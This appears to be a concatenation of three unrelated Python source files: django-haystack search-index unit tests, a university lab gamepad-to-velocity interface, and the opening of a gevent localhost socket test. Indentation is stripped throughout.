extra = indexes.CharField(indexed=False, use_template=True)
def get_model(self):
return MockModel
# For testing inheritance...
class AltGoodMockSearchIndex(GoodMockSearchIndex, indexes.Indexable):
additional = indexes.CharField(model_attr="author")
def get_model(self):
return MockModel
class GoodCustomMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", faceted=True)
pub_date = indexes.DateTimeField(model_attr="pub_date", faceted=True)
extra = indexes.CharField(indexed=False, use_template=True)
hello = indexes.CharField(model_attr="hello")
def prepare(self, obj):
super(GoodCustomMockSearchIndex, self).prepare(obj)
self.prepared_data["whee"] = "Custom preparation."
return self.prepared_data
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def load_all_queryset(self):
return self.get_model()._default_manager.filter(id__gt=1)
def get_model(self):
return MockModel
def index_queryset(self, using=None):
return MockModel.objects.all()
def read_queryset(self, using=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
def build_queryset(self, start_date=None, end_date=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
class GoodNullableMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", null=True, faceted=True)
def get_model(self):
return MockModel
class GoodOverriddenFieldNameMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(
document=True, use_template=True, index_fieldname="more_content"
)
author = indexes.CharField(model_attr="author", index_fieldname="name_s")
hello = indexes.CharField(model_attr="hello")
def get_model(self):
return MockModel
class GoodFacetedMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
author_foo = indexes.FacetCharField(facet_for="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
pub_date_exact = indexes.FacetDateTimeField(facet_for="pub_date")
def get_model(self):
return MockModel
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def prepare_pub_date_exact(self, obj):
return "2010-10-26T01:54:32"
class MROFieldsSearchIndexA(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_a")
def get_model(self):
return MockModel
class MROFieldsSearchIndexB(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_b")
def get_model(self):
return MockModel
class MROFieldsSearchChild(MROFieldsSearchIndexA, MROFieldsSearchIndexB):
pass
class ModelWithManyToManyFieldAndAttributeLookupSearchIndex(
indexes.SearchIndex, indexes.Indexable
):
text = indexes.CharField(document=True)
related_models = indexes.MultiValueField(model_attr="related_models__name")
def get_model(self):
return ManyToManyLeftSideModel
class SearchIndexTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super(SearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.mi = GoodMockSearchIndex()
self.cmi = GoodCustomMockSearchIndex()
self.cnmi = GoodNullableMockSearchIndex()
self.gfmsi = GoodFacetedMockSearchIndex()
# Fake the unified index.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.ui.build(indexes=[self.mi])
connections["default"]._index = self.ui
self.sample_docs = {
"core.mockmodel.1": {
"text": "Indexed!\n1",
"django_id": "1",
"django_ct": "core.mockmodel",
"extra": "Stored!\n1",
"author": "daniel1",
"pub_date": datetime.datetime(2009, 3, 17, 6, 0),
"id": "core.mockmodel.1",
},
"core.mockmodel.2": {
"text": "Indexed!\n2",
"django_id": "2",
"django_ct": "core.mockmodel",
"extra": "Stored!\n2",
"author": "daniel2",
"pub_date": datetime.datetime(2009, 3, 17, 7, 0),
"id": "core.mockmodel.2",
},
"core.mockmodel.3": {
"text": "Indexed!\n3",
"django_id": "3",
"django_ct": "core.mockmodel",
"extra": "Stored!\n3",
"author": "daniel3",
"pub_date": datetime.datetime(2009, 3, 17, 8, 0),
"id": "core.mockmodel.3",
},
}
def tearDown(self):
connections["default"]._index = self.old_unified_index
super(SearchIndexTestCase, self).tearDown()
def test_no_contentfield_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex1)
def test_too_many_contentfields_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex2)
def test_contentfield_present(self):
try:
mi = GoodMockSearchIndex()
except:
self.fail()
def test_proper_fields(self):
self.assertEqual(len(self.mi.fields), 4)
self.assertTrue("text" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["extra"], indexes.CharField))
self.assertEqual(len(self.cmi.fields), 7)
self.assertTrue("text" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["author"], indexes.CharField))
self.assertTrue("author_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["author_exact"], indexes.FacetCharField)
)
self.assertTrue("pub_date" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("pub_date_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["pub_date_exact"], indexes.FacetDateTimeField)
)
self.assertTrue("extra" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
self.assertTrue("hello" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
def test_index_queryset(self):
self.assertEqual(len(self.cmi.index_queryset()), 3)
def test_read_queryset(self):
self.assertEqual(len(self.cmi.read_queryset()), 2)
def test_build_queryset(self):
# The custom SearchIndex.build_queryset returns the same records as
# the read_queryset
self.assertEqual(len(self.cmi.build_queryset()), 2)
# Store a reference to the original method
old_guf = self.mi.__class__.get_updated_field
self.mi.__class__.get_updated_field = lambda self: "pub_date"
# With an updated field, we should get have filtered results
sd = datetime.datetime(2009, 3, 17, 7, 0)
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 2)
ed = datetime.datetime(2009, 3, 17, 7, 59)
self.assertEqual(len(self.mi.build_queryset(end_date=ed)), 2)
sd = datetime.datetime(2009, 3, 17, 6, 0)
ed = datetime.datetime(2009, 3, 17, 6, 59)
self.assertEqual(len(self.mi.build_queryset(start_date=sd, end_date=ed)), 1)
# Remove the updated field for the next test
del self.mi.__class__.get_updated_field
# The default should return all 3 even if we specify a start date
# because there is no updated field specified
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 3)
# Restore the original attribute
self.mi.__class__.get_updated_field = old_guf
def test_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.mi.prepare(mock)), 7)
self.assertEqual(
sorted(self.mi.prepare(mock).keys()),
["author", "django_ct", "django_id", "extra", "id", "pub_date", "text"],
)
def test_custom_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
def test_thread_safety(self):
# This is a regression. ``SearchIndex`` used to write to
# ``self.prepared_data``, which would leak between threads if things
# went too fast.
exceptions = []
def threaded_prepare(index_queue, index, model):
try:
index.queue = index_queue
prepped = index.prepare(model)
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchIndex(GoodMockSearchIndex):
def prepare_author(self, obj):
if obj.pk == 20:
time.sleep(0.1)
else:
time.sleep(0.5)
index_queue.put(self.prepared_data["author"])
return self.prepared_data["author"]
tmi = ThreadedSearchIndex()
index_queue = queue.Queue()
mock_1 = MockModel()
mock_1.pk = 20
mock_1.author = "foo"
mock_1.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock_2 = MockModel()
mock_2.pk = 21
mock_2.author = "daniel%s" % mock_2.id
mock_2.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
th1 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_1))
th2 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_2))
th1.start()
th2.start()
th1.join()
th2.join()
mock_1_result = index_queue.get()
mock_2_result = index_queue.get()
self.assertEqual(mock_1_result, "foo")
self.assertEqual(mock_2_result, "daniel21")
def test_custom_prepare_author(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["author"], "Hi, I'm daniel20")
self.assertEqual(self.cmi.prepared_data["author_exact"], "Hi, I'm daniel20")
def test_custom_model_attr(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["hello"], "World!")
def test_custom_index_fieldname(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
cofnmi = GoodOverriddenFieldNameMockSearchIndex()
self.assertEqual(len(cofnmi.prepare(mock)), 6)
self.assertEqual(
sorted(cofnmi.prepare(mock).keys()),
["django_ct", "django_id", "hello", "id", "more_content", "name_s"],
)
self.assertEqual(cofnmi.prepared_data["name_s"], "daniel20")
self.assertEqual(cofnmi.get_content_field(), "more_content")
def test_get_content_field(self):
self.assertEqual(self.mi.get_content_field(), "text")
def test_update(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
self.sb.clear()
def test_update_object(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "20")],
)
self.sb.clear()
def test_remove_object(self):
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
# Put it back so we can test passing kwargs.
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock, commit=False)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[
("core.mockmodel", "1"),
("core.mockmodel", "2"),
("core.mockmodel", "3"),
("core.mockmodel", "20"),
],
)
self.sb.clear()
def test_clear(self):
self.mi.update()
self.assertGreater(self.sb.search("*")["hits"], 0)
self.mi.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
def test_reindex(self):
self.mi.reindex()
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
self.sb.clear()
def test_inheritance(self):
try:
agmi = AltGoodMockSearchIndex()
except:
self.fail()
self.assertEqual(len(agmi.fields), 5)
self.assertTrue("text" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["text"], indexes.CharField))
self.assertTrue("author" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["extra"], indexes.CharField))
self.assertTrue("additional" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["additional"], indexes.CharField))
def test_proper_field_resolution(self):
mrofsc = MROFieldsSearchChild()
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock.test_a = "This is A"
mock.test_b = "This is B"
self.assertEqual(len(mrofsc.fields), 1)
prepped_data = mrofsc.prepare(mock)
self.assertEqual(len(prepped_data), 4)
self.assertEqual(prepped_data["text"], "This is A")
def test_load_all_queryset(self):
self.assertEqual([obj.id for obj in self.cmi.load_all_queryset()], [2, 3])
def test_nullable(self):
mock = MockModel()
mock.pk = 20
mock.author = None
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.cnmi.prepare(mock)
self.assertEqual(len(prepared_data), 6)
self.assertEqual(
sorted(prepared_data.keys()),
["author", "author_exact", "django_ct", "django_id", "id", "text"],
)
prepared_data = self.cnmi.full_prepare(mock)
self.assertEqual(len(prepared_data), 4)
self.assertEqual(
sorted(prepared_data.keys()), ["django_ct", "django_id", "id", "text"]
)
def test_custom_facet_fields(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel"
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.gfmsi.prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
prepared_data = self.gfmsi.full_prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
self.assertEqual(prepared_data["author_foo"], "Hi, I'm daniel")
self.assertEqual(prepared_data["pub_date_exact"], "2010-10-26T01:54:32")
class BasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
class FieldsModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
fields = ["author", "pub_date"]
class ExcludesModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
excludes = ["author", "foo"]
class FieldsWithOverrideModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
foo = indexes.IntegerField(model_attr="foo")
class Meta:
model = MockModel
fields = ["author", "foo"]
def get_index_fieldname(self, f):
if f.name == "author":
return "author_bar"
else:
return f.name
class YetAnotherBasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
class Meta:
model = AThirdMockModel
class PolymorphicModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
average_delay = indexes.FloatField(null=True)
def get_model(self):
return AnotherMockModel
def prepare(self, obj):
self.prepared_data = super(PolymorphicModelSearchIndex, self).prepare(obj)
if isinstance(obj, AThirdMockModel):
self.prepared_data["average_delay"] = obj.average_delay
return self.prepared_data
def index_queryset(self, using=None):
return self.get_model().objects.all()
class GhettoAFifthMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
def get_model(self):
return AFifthMockModel
def index_queryset(self, using=None):
# Index everything,
return self.get_model().objects.complete_set()
def read_queryset(self, using=None):
return self.get_model().objects.all()
class ReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class TextReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class ModelWithManyToManyFieldModelSearchIndex(indexes.ModelSearchIndex):
def get_model(self):
return ManyToManyLeftSideModel
class ModelSearchIndexTestCase(TestCase):
def setUp(self):
super(ModelSearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.bmsi = BasicModelSearchIndex()
self.fmsi = FieldsModelSearchIndex()
self.emsi = ExcludesModelSearchIndex()
self.fwomsi = FieldsWithOverrideModelSearchIndex()
self.yabmsi = YetAnotherBasicModelSearchIndex()
self.m2mmsi = ModelWithManyToManyFieldModelSearchIndex()
def test_basic(self):
self.assertEqual(len(self.bmsi.fields), 4)
self.assertTrue("foo" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["foo"], indexes.CharField))
self.assertEqual(self.bmsi.fields["foo"].null, False)
self.assertEqual(self.bmsi.fields["foo"].index_fieldname, "foo")
self.assertTrue("author" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["author"], indexes.CharField))
self.assertEqual(self.bmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue(
isinstance(self.bmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["text"], indexes.CharField))
self.assertEqual(self.bmsi.fields["text"].document, True)
self.assertEqual(self.bmsi.fields["text"].use_template, True)
def test_fields(self):
self.assertEqual(len(self.fmsi.fields), 3)
self.assertTrue("author" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["text"], indexes.CharField))
def test_excludes(self):
self.assertEqual(len(self.emsi.fields), 2)
self.assertTrue("pub_date" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["text"], indexes.CharField))
self.assertNotIn("related_models", self.m2mmsi.fields)
def test_fields_with_override(self):
self.assertEqual(len(self.fwomsi.fields), 3)
self.assertTrue("author" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["author"], indexes.CharField))
self.assertTrue("foo" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["foo"], indexes.IntegerField))
self.assertTrue("text" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["text"], indexes.CharField))
def test_overriding_field_name_with_get_index_fieldname(self):
self.assertTrue(self.fwomsi.fields["foo"].index_fieldname, "foo")
self.assertTrue(self.fwomsi.fields["author"].index_fieldname, "author_bar")
def test_float_integer_fields(self):
self.assertEqual(len(self.yabmsi.fields), 5)
self.assertEqual(
sorted(self.yabmsi.fields.keys()),
["author", "average_delay", "pub_date", "text", "view_count"],
)
self.assertTrue("author" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["author"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"], indexes.DateTimeField)
)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["text"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["text"].document, True)
self.assertEqual(self.yabmsi.fields["text"].use_template, False)
self.assertTrue("view_count" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["view_count"], indexes.IntegerField)
)
self.assertEqual(self.yabmsi.fields["view_count"].null, False)
self.assertEqual(self.yabmsi.fields["view_count"].index_fieldname, "view_count")
self.assertTrue("average_delay" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["average_delay"], indexes.FloatField)
)
self.assertEqual(self.yabmsi.fields["average_delay"].null, False)
self.assertEqual(
self.yabmsi.fields["average_delay"].index_fieldname, "average_delay"
)
class ModelWithManyToManyFieldAndAttributeLookupSearchIndexTestCase(TestCase):
def test_full_prepare(self):
index = ModelWithManyToManyFieldAndAttributeLookupSearchIndex()
left_model = ManyToManyLeftSideModel.objects.create()
right_model_1 = ManyToManyRightSideModel.objects.create(name="Right side 1")
right_model_2 = ManyToManyRightSideModel.objects.create()
left_model.related_models.add(right_model_1)
left_model.related_models.add(right_model_2)
result = index.full_prepare(left_model)
self.assertDictEqual(
result,
{
"django_ct": "core.manytomanyleftsidemodel",
"django_id": "1",
"text": None,
"id": "core.manytomanyleftsidemodel.1",
"related_models": ["Right side 1", "Default name"],
},
)
class PolymorphicModelTestCase(TestCase):
def test_prepare_with_polymorphic(self):
index = PolymorphicModelSearchIndex()
parent_model = AnotherMockModel()
parent_model.author = "Paul"
parent_model.pub_date = datetime.datetime(2018, 5, 23, 13, 57)
parent_model.save()
child_model = AThirdMockModel()
child_model.author = "Paula"
child_model.pub_date = datetime.datetime(2018, 5, 23, 13, 58)
child_model.average_delay = 0.5
child_model.save()
prepared_data = index.prepare(parent_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], None)
prepared_data = index.prepare(child_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], 0.5)
|
game_pad_interface.py
|
#!/usr/bin/env python
'''
MEGN540 Mechatronics Lab
Copyright (C) Andrew Petruska, 2021.
apetruska [at] mines [dot] edu
www.mechanical.mines.edu
'''
'''
Copyright (c) 2021 Andrew Petruska at Colorado School of Mines
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from inputs_mod import get_gamepad, devices
# FOR THREADING AND MUTEX PROTECTION (used in serial interface primarily)
from threading import Thread, Lock
import collections # FOR DEQUEUE USED IN DATA STORAGE AND CALLBACK QUEUES
import time
class MEGN540_GamePadInterface:
def __init__(self):
self.is_running = False
self.thread = None
self.cb_thread = None
self.cbk_list = collections.deque()
self.callback_list_mutex = Lock()
self.rate_mutex = Lock()
self.last_send_time = time.perf_counter()
self.gamepad = None
self.lin_vel = 0
self.ang_vel = 0
self.changed = True
def connect(self):
if self.is_running is False and len(devices.gamepads) > 0:
if not self.gamepad:
self.gamepad = devices.gamepads[0]
self.thread = Thread(target=self.event_thread)
self.is_running = True
self.thread.start()
self.cb_thread = Thread(target=self.process_callbacks)
self.cb_thread.start()
print("Game Pad Event Handler Started")
else:
print("Could not connect to gamepad.")
def disconnect(self):
self.is_running = False
self.gamepad = None
if self.thread:
self.thread.join(0.1)
if self.cb_thread:
self.cb_thread.join(0.1)
self.thread = None
self.cb_thread = None
def is_connected(self):
return self.is_running
def add_callback(self, cbk_function):
self.callback_list_mutex.acquire()
try:
self.cbk_list.append(cbk_function)
finally:
self.callback_list_mutex.release()
def rm_callback(self, cbk_function):
self.callback_list_mutex.acquire()
try:
self.cbk_list.remove(cbk_function)
finally:
self.callback_list_mutex.release()
def rumble_pad(self):
self.gamepad.set_vibration(1, 0, 1000)
def event_thread(self):
while self.is_running:
try:
events = devices.gamepads[0]._do_iter()
#events = get_gamepad()
if events is None:
time.sleep(0.0001)
continue
for event in events:
if event.ev_type is "Absolute":
try:
self.rate_mutex.acquire()
if event.code is "ABS_X":
#self.ang_vel = -6.28*(event.state-128)/128
#self.changed = True
continue
elif event.code is "ABS_Y":
self.lin_vel = -0.5*(event.state-128)/128
self.changed = True
elif event.code is "ABS_RZ":
#self.lin_vel = -0.5*(event.state-128)/128
#self.changed = True
continue
elif event.code is "ABS_Z":
self.ang_vel = -6.28*(event.state-128)/128
self.changed = True
finally:
self.rate_mutex.release()
except:
print("Game pad error! Disconnecting")
break;
self.is_running = False
def process_callbacks(self):
while self.is_running:
try:
self.rate_mutex.acquire()
if time.perf_counter() - self.last_send_time > 0.1 and self.changed:
self.callback_list_mutex.acquire()
try:
if abs(self.ang_vel) < 0.01:
self.ang_vel = 0
if abs(self.lin_vel) < 0.01:
self.lin_vel = 0
for function in self.cbk_list:
function(self.lin_vel, self.ang_vel)
finally:
self.callback_list_mutex.release()
self.last_send_time = time.perf_counter()
self.changed = False
finally:
self.rate_mutex.release()
time.sleep(0.03)
def print_check(lin,ang):
print("Lin: " + str(lin) + " Ang: " + str(ang) )
def main():
devices.gamepads[0]
events = get_gamepad()
interface = MEGN540_GamePadInterface()
interface.add_callback(print_check)
interface.connect()
while interface.is_connected():
continue
if __name__ == "__main__":
main()
|
test__socket.py
|
from gevent import monkey; monkey.patch_all()
import sys
import os
import array
import socket
import traceback
import time
import unittest
import greentest
from functools import wraps
from greentest import six
from greentest import LARGE_TIMEOUT
# we use threading on purpose so that we can test both regular and gevent sockets with the same code
from threading import Thread as _Thread
errno_types = int
def wrap_error(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except: # pylint:disable=bare-except
traceback.print_exc()
os._exit(2)
return wrapper
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
target = wrap_error(target)
_Thread.__init__(self, target=target, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
self.listener = self._close_on_teardown(self._setup_listener())
# XXX: On Windows (at least with libev), if we have a cleanup/tearDown method
# that does 'del self.listener' AND we haven't sometime
# previously closed the listener (while the test body was executing)
# we tend to sometimes see hangs when tests run in succession;
# notably test_empty_send followed by test_makefile produces a hang
# in test_makefile when it tries to read from the client_file, because
# the accept() call in accept_once has not yet returned a new socket to
# write to.
# The cause *seems* to be that the listener socket in both tests gets the
# same fileno(); or, at least, if we don't del the listener object,
# we get a different fileno, and that scenario works.
# Perhaps our logic is wrong in libev_vfd in the way we use
# _open_osfhandle and determine we can close it?
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
listener = socket.socket()
greentest.bind_and_listen(listener, ('127.0.0.1', 0))
return listener
def create_connection(self, host='127.0.0.1', port=None, timeout=None,
blocking=None):
sock = socket.socket()
sock.connect((host, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return self._close_on_teardown(sock)
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
read_data = []
server_exc_info = []
def accept_and_read():
conn = None
try:
conn, _ = self.listener.accept()
r = conn.makefile(mode='rb')
read_data.append(r.read())
r.flush()
r.close()
except: # pylint:disable=bare-except
server_exc_info.append(sys.exc_info())
finally:
if conn:
conn.close()
self.listener.close()
server = Thread(target=accept_and_read)
